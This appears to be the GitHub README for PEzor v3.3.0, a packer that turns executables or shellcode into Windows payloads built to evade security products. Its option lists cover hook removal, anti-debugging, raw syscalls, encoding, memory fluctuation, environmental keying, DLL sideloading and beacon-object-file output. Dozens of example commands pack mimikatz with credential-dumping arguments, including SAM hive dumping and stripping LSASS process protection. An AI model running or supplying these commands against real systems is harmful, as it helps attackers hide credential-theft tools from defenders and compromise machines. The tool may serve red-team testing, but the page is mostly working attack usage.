PEzor

Read the blog posts here:

 ________________
< PEzor!! v3.3.0 >
 ----------------
      \                    / \  //\
       \    |\___/|      /   \//  \\
            /0  0  \__  /    //  | \ \
           /     /  \/_/    //   |  \  \
           @_^_@'/   \/_   //    |   \   \
           //_^_/     \/_ //     |    \    \
        ( //) |        \///      |     \     \
      ( / /) _|_ /   )  //       |      \     _\
    ( // /) '/,_ _ _/  ( ; -.    |    _ _\.-~        .-~~~^-.
  (( / / )) ,-{        _      `-.|.-~-.           .~         `.
 (( // / ))  '/\      /                 ~-. _ .-~      .-~^-.  \
 (( /// ))      `.   {            }                   /      \  \
  (( / ))     .----~-.\        \-'                 .~         \  `. \^-.
             ///.----..>        \             _ -~             `.  ^-`  ^-_
               ///-._ _ _ _ _ _ _}^ - - - - ~                     ~-- ,.-~
                                                                  /.-~
---------------------------------------------------------------------------

Installation
Usage

Installation

The install.sh is designed to work on a Kali Linux distro.

$ git clone https://github.com/phra/PEzor.git
$ cd PEzor
$ sudo bash install.sh
$ bash PEzor.sh -h

Upgrading from v2.x.x

~~The PATH variable has to be updated to use a specific commit of Donut! Check the updated install.sh script.~~

Usage

PEzor -h
PEzor <EXECUTABLE> [donut args...]
PEzor <SHELLCODE>

`PEzor help`

display help for PEzor

USAGE
  $ PEzor help

`PEzor <EXECUTABLE>`

Pack the provided executable into a new one

OPTIONS
  -h                        Show usage and exits
  -32                       Force 32-bit executable
  -64                       Force 64-bit executable
  -debug                    Generate a debug build
  -unhook                   User-land hooks removal
  -antidebug                Add anti-debug checks
  -syscalls                 Use raw syscalls [64-bit only] [Windows 10 only]
  -sgn                      Encode the generated shellcode with sgn
  -text                     Store shellcode in .text section instead of .data
  -rx                       Allocate RX memory for shellcode
  -self                     Execute the shellcode in the same thread
  -sdk=VERSION              Use specified .NET Framework version (2, 4, 4.5 (default))
  -cleanup                  Perform the cleanup of allocated payload and loaded modules (only for BOFs)
  -sleep=N                  Sleeps for N seconds before unpacking the shellcode
  -format=FORMAT            Outputs result in specified FORMAT (exe, dll, reflective-dll, service-exe, service-dll, dotnet, dotnet-createsection, dotnet-pinvoke)
  -fluctuate=PROTECTION     Fluctuate memory region to PROTECTION (RW or NA) by hooking Sleep()
  -xorkey=KEY               Encrypt payload with a simple multibyte XOR, it retrieves the key at runtime by using GetComputerNameExA(ComputerNameDnsFullyQualified)
  [donut args...]           After the executable to pack, you can pass additional Donut args, such as -z 2

EXAMPLES
  # 64-bit (self-inject RWX)
  $ PEzor.sh -unhook -antidebug -text -self -sleep=120 mimikatz/x64/mimikatz.exe -z 2
  # 64-bit (self-inject RX)
  $ PEzor.sh -unhook -antidebug -text -self -rx -sleep=120 mimikatz/x64/mimikatz.exe -z 2
  # 64-bit (raw syscalls)
  $ PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 mimikatz/x64/mimikatz.exe -z 2
  # 64-bit (fluctuate to READWRITE when sleeping)
  $ PEzor.sh -fluctuate=RW -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"coffee" "sleep 5000" "coffee" "exit"'
  # 64-bit (fluctuate to NOACCESS when sleeping)
  $ PEzor.sh -fluctuate=NA -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"coffee" "sleep 5000" "coffee" "exit"'
  # 64-bit (use environmental keying with GetComputerNameExA)
  $ PEzor.sh -xorkey=MY-FQDN-COMPUTER-NAME -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"coffee" "sleep 5000" "coffee" "exit"'
  # 64-bit (support EXEs with resources by keeping PE headers in memory)
  $ PEzor.sh -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -k 2 -p '"!+" "!processprotect" "/process:lsass.exe" "/remove" "!-" "exit"'
  # 64-bit (beacon object file)
  $ PEzor.sh -format=bof mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
  # 64-bit (beacon object file w/ cleanup)
  $ PEzor.sh -format=bof -cleanup mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
  # 64-bit (dll)
  $ PEzor.sh -format=dll mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\users\public\mimi.out\" \"token::whoami\" \"exit\"'
  # 64-bit (dll sideload)
  $ PEzor.sh -format=dll -dll-sideload=version.dll mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\users\public\mimi.out\" \"token::whoami\" \"exit\"'
  # 64-bit (reflective dll)
  $ PEzor.sh -format=reflective-dll mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
  # 64-bit (service exe)
  $ PEzor.sh -format=service-exe mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
  # 64-bit (service dll)
  $ PEzor.sh -format=service-dll mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
  # 64-bit (dotnet)
  $ PEzor.sh -format=dotnet -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
  # 64-bit (dotnet-pinvoke)
  $ PEzor.sh -format=dotnet-pinvoke -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
  # 64-bit (dotnet-createsection)
  $ PEzor.sh -format=dotnet-createsection -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
  # 32-bit (self-inject)
  $ PEzor.sh -unhook -antidebug -text -self -sleep=120 mimikatz/Win32/mimikatz.exe -z 2
  # 32-bit (Win32 API: VirtualAlloc/WriteProcessMemory/CreateRemoteThread)
  $ PEzor.sh -sgn -unhook -antidebug -text -sleep=120 mimikatz/Win32/mimikatz.exe -z 2
  # 32-bit (Win32 API: VirtualAlloc/WriteProcessMemory/CreateRemoteThread) and arguments for donut
  $ PEzor.sh -sgn -unhook -antidebug -text -sleep=120 mimikatz/Win32/mimikatz.exe -z 2 "-plsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv"

`PEzor <SHELLCODE>`

Pack the provided shellcode into an executable

USAGE
  $ PEzor <-32|-64> [options...] <SHELLCODE>

OPTIONS
  -h                        Show usage and exits
  -32                       Force 32-bit executable
  -64                       Force 64-bit executable
  -debug                    Generate a debug build
  -unhook                   User-land hooks removal
  -antidebug                Add anti-debug checks
  -shellcode                Force shellcode detection
  -syscalls                 Use raw syscalls [64-bit only] [Windows 10 only]
  -sgn                      Encode the provided shellcode with sgn
  -text                     Store shellcode in .text section instead of .data
  -rx                       Allocate RX memory for shellcode
  -self                     Execute the shellcode in the same thread [requires RX shellcode, not compatible with -sgn]
  -cleanup                  Perform the cleanup of allocated payload and loaded modules (only for BOFs)
  -sleep=N                  Sleeps for N seconds before unpacking the shellcode
  -format=FORMAT            Outputs result in specified FORMAT (exe, dll, reflective-dll, service-exe, service-dll, dotnet, dotnet-createsection, dotnet-pinvoke)
  -fluctuate=PROTECTION     Fluctuate memory region to PROTECTION (RW or NA) by hooking Sleep()
  -xorkey=KEY               Encrypt payload with a simple multibyte XOR, it retrieves the key at runtime by using GetComputerNameExA(ComputerNameDnsFullyQualified)

EXAMPLES
  # 64-bit (self-inject RWX)
  $ PEzor.sh shellcode.bin
  # 64-bit (self-inject RX)
  $ PEzor.sh -unhook -antidebug -text -self -rx -sleep=120 shellcode.bin
  # 64-bit (self-inject)
  $ PEzor.sh -unhook -antidebug -text -self -sleep=120 shellcode.bin
  # 64-bit (raw syscalls)
  $ PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 shellcode.bin
  # 64-bit (fluctuate to READWRITE when sleeping)
  $ PEzor.sh -fluctuate=RW shellcode.bin
  # 64-bit (fluctuate to NOACCESS when sleeping)
  $ PEzor.sh -fluctuate=NA shellcode.bin
  # 64-bit (use environmental keying with GetComputerNameExA)
  $ PEzor.sh -xorkey=MY-FQDN-MACHINE-NAME shellcode.bin
  # 64-bit (beacon object file)
  $ PEzor.sh -format=bof shellcode.bin
  # 64-bit (beacon object file w/ cleanup)
  $ PEzor.sh -format=bof -cleanup shellcode.bin
  # 64-bit (dll)
  $ PEzor.sh -format=dll shellcode.bin
  # 64-bit (dll sideload)
  $ PEzor.sh -format=dll -dll-sideload=version.dll shellcode.bin
  # 64-bit (reflective dll)
  $ PEzor.sh -format=reflective-dll shellcode.bin
  # 64-bit (service exe)
  $ PEzor.sh -format=service-exe shellcode.bin
  # 64-bit (service dll)
  $ PEzor.sh -format=service-dll shellcode.bin
  # 64-bit (dotnet)
  $ PEzor.sh -format=dotnet shellcode.bin
  # 64-bit (dotnet-pinvoke)
  $ PEzor.sh -format=dotnet-pinvoke shellcode.bin
  # 64-bit (dotnet-createsection)
  $ PEzor.sh -format=dotnet-createsection shellcode.bin
  # 32-bit (self-inject)
  $ PEzor.sh -unhook -antidebug -text -self -sleep=120 shellcode.bin
  # 32-bit (Win32 API: VirtualAlloc/WriteProcessMemory/CreateRemoteThread)
  $ PEzor.sh -sgn -unhook -antidebug -text -sleep=120 shellcode.bin

See code: PEzor.sh

Name	Name	Last commit message	Last commit date
Latest commit phra Sep 26, 2023 b4e5927 · Sep 26, 2023 History 135 Commits
.vscode	.vscode	release(public): v1.0.0	Jul 22, 2020
ReflectiveDLLInjection	ReflectiveDLLInjection	deps: add ReflectiveDLLInjection from rapid7 fork	Oct 11, 2020
aggressor	aggressor	feat: update cna for env keying support	Sep 7, 2022
dotnet	dotnet	fix: typos	Oct 18, 2020
examples	examples	chore: add proxy dll source code to compilation	Sep 26, 2023
.gitignore	.gitignore	chore: update .gitignore for bof support	Jul 1, 2021
ApiSetMap.c	ApiSetMap.c	release(public): v1.0.0	Jul 22, 2020
ApiSetMap.h	ApiSetMap.h	release(public): v1.0.0	Jul 22, 2020
LICENSE	LICENSE	release(public): v1.0.0	Jul 22, 2020
PEzor.cpp	PEzor.cpp	feat: implement payload and modules cleanup for BOFs	Jul 5, 2021
PEzor.hpp	PEzor.hpp	fix: remove include iostream in non-debug builds	Oct 23, 2020
PEzor.sh	PEzor.sh	release: v3.3.0	Sep 26, 2023
README.md	README.md	release: v3.3.0	Sep 26, 2023
bof.cpp	bof.cpp	chore: add debug prints to cleanupModules	Jul 8, 2021
docker.sh	docker.sh	release(public): v1.0.0	Jul 22, 2020
fluctuate.cpp	fluctuate.cpp	fix: print address with type and protection	Oct 27, 2021
fluctuate.hpp	fluctuate.hpp	refactor: small fixes	Oct 26, 2021
inject.cpp	inject.cpp	chore: remove debug puts	Sep 26, 2023
inject.hpp	inject.hpp	feat: integrate fluctuate() in inject.cpp	Oct 25, 2021
install.sh	install.sh	deps: add wine64-tools	Sep 26, 2023
install.test.sh	install.test.sh	chore: update mimikatz download url	Aug 18, 2023
loader.c	loader.c	release(public): v1.0.0	Jul 22, 2020
loader.h	loader.h	release(public): v1.0.0	Jul 22, 2020
shellcode.hpp	shellcode.hpp	release(public): v1.0.0	Jul 22, 2020
sleep.hpp	sleep.hpp	release(public): v1.0.0	Jul 22, 2020
syscalls.hpp	syscalls.hpp	fix: remove include iostream in non-debug builds	Oct 23, 2020

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

PEzor

Installation

Upgrading from v2.x.x

Usage

`PEzor help`

`PEzor <EXECUTABLE>`

`PEzor <SHELLCODE>`

About

Releases

Packages

Contributors 3

Languages

License

phra/PEzor

Folders and files

Latest commit

History

Repository files navigation

PEzor

Installation

Upgrading from v2.x.x

Usage

PEzor help

PEzor <EXECUTABLE>

PEzor <SHELLCODE>

About

Topics

Resources

License

Stars

Watchers

Forks

Releases

Packages 0

Contributors 3

Languages

`PEzor help`

`PEzor <EXECUTABLE>`

`PEzor <SHELLCODE>`

Packages